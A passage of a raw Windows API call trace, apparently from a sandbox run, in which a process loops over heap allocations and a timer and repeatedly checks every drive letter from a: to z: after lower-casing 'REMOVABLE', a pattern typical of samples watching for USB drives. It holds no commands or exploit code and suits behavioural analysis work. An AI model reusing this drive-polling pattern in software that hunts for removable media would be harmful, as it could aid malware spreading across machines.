wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.228] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.229] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0217.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.229] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd370 [0217.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.229] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0217.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0217.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0217.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0217.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.229] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.229] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.230] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.230] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.230] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.230] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.230] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.231] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.231] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.231] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.231] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.231] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.232] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.232] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.232] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.232] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.232] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.233] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.233] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.233] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.234] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.234] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.234] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.234] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.234] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.235] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.235] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0217.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0217.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.236] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0217.237] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.237] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.237] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0217.237] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.240] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.240] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.240] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0217.241] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.241] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.241] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0217.241] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.241] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.241] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.241] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.241] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.241] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.241] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0217.242] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.242] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0217.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0217.242] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0217.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0217.242] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0217.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0217.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0217.243] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0217.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0217.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0217.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0217.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.243] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.243] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.244] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.244] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.244] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.244] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.244] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.244] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.245] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.245] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.245] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.246] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.246] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.246] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.246] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.247] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.247] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.247] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.247] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.248] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.248] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.249] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.249] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.249] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.249] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.250] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.250] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0217.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0217.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.251] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.251] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.251] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.251] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.251] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.251] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0217.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0217.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0217.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0217.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0217.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0217.252] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0217.252] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0217.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0217.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.253] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.253] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0217.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.253] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0217.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0217.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.253] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0217.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.254] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.254] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.254] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.254] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.255] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.255] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.255] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.255] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.256] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.256] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.256] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.256] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.257] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.257] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.257] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.257] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.258] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.258] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.259] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.259] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.259] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.259] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.259] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.260] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.260] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.260] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.260] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.261] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.261] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.261] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.261] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.261] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.261] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0217.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.261] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.261] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f40 [0217.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.261] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.261] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f40 | out: hHeap=0x12c0000) returned 1 [0217.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.262] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0217.262] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0217.262] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) 